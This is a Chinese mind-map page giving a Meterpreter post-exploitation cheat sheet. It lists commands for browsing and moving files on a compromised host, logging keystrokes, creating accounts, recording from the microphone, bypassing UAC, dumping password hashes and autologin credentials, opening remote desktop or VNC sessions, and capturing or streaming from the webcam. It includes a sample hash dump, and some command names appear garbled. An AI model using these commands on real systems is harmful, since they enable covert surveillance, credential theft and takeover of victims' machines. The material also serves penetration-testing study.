导图社区 后参透
后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获..
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作 首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马...
第一步:终端启动MSFCONSOLE 以管理员身份运行 sudo msfconsole 出现msf提示符了,就登录成功了 第二步:寻找模块 使用search加上自己想找的模块(相当于模糊查询) 使用search命令搜索所有有效的Linux模块 search linux
社区模板帮助中心,点此进入>>
论语孔子简单思维导图
《傅雷家书》思维导图
《童年》读书笔记
《茶馆》思维导图
《朝花夕拾》篇目思维导图
《昆虫记》思维导图
《安徒生童话》思维导图
《鲁滨逊漂流记》读书笔记
《这样读书就够了》读书笔记
妈妈必读:一张0-1岁孩子认知发展的精确时间表
后参透文件系统
文件交互指令
cat:读取文件内容
cd:靶机目录
cp:复制文件到目标
mv:移动到目标
chmod:修改文件权限(如:chmod 777 shell.elf)
del 或 rm:删除靶机文件
dir:打印靶机目录
mkdir:在靶机上创建目录
rmdir:删除靶机目录
edit:编辑文件
getlwd:打印本地目录
getwd:打倒靶机目录
lcd:更改本地目录
lls:列出本地目录
ls:列出靶机文件目录
lpwd:打印本地目录
pwd:打印工作目录
search:搜索文件详情 search -h
上传下载文件
upload:上传文件到靶机
download:从靶机下载文件
屏幕截图
screenshot:截图
键盘记录
keyscan_start:启动键盘记录
keyscan_dump:导出键盘
keyscan_stop:停止键盘记录
创建账户
查看目标靶机存在用户 meterpreter 输入:run post/windows/gather/enum_logged_on_users
创建账户:run getui -u {用户名} msb -p {密码} 例如:run getui -u msb -p 123456
音频设备录音
record_mic:录音
-d:是设置录音时长 时间除2
-f:设置未见路径
-p:控制自动播放
-h:查看帮助
例如: record_mic -d 10 -p true
提权实战
安后门到 meterpreter
getsystem
background
search bypassuac
use exploit/windows/local/bypassuac_windows_store_reg
options
session:查看session号
set session 1
返回到 meterpreter
获取登录账号密码
首先获得一个有system权限的meterpreter
有自动登录可:run windows/gather/credentials/windows_autologin
导出数据库本地用户账号:run post/windows/gather/smart_hashdump
例如: | 用户名 | SID | LM哈希: | NTLM哈希1::: | | mb | 1000 | aad3b435b51404eeaad3b435b51404ee |32ed87bdb5fdc5e9cba88547376818d4 |
用 hashdump 获取密码:run hashdump
远程控制
rdesktop
-u:账户名
-p:密码
-a 16:指使用16位色显示远程画面
-f:全屏模式(用Ctrl+Alt+Enter 组合键退出全屏)
-g:设置分辨率:-g 1024 x 768
rdesktop -h:查看rdesktop使用帮助
rdesktop -u 用户名 -p 密码 -f IP
rdesktop -u mb -p 123456 -f -g 1024x720 192.168.110.24
run vnc
调用摄像头
webcam_list:列出靶机中的所有软,硬件摄像头列表,并编号
webcam_snap:可调用单个软,硬件摄像头拍照,默认调用第一个摄像头
webcam_stream:可调用单个软,硬件摄像头直播,默认调用第一个摄像头
webcam_list
-h:显示帮助
-i:-i 1 代表调用摄像头编号
-p:-p /root 设置存储路径
-q:-q 100 表示存储图片的质量默认为 50
-v:-v false -v 2个参数 true 和 false 这个参数表示拍照后自动打开,默认参数为 true
webcam_stream
-d:-d 100 设置流持续时间为100秒 默认为1800
-q:-q 100 指流质量,默认为50
-s:-s live 指流文件路径,默认输出在当前目录(注意目录不存在不会自动创建)
-f:-f live 指播放文件的存储地址,默认输出在当前目录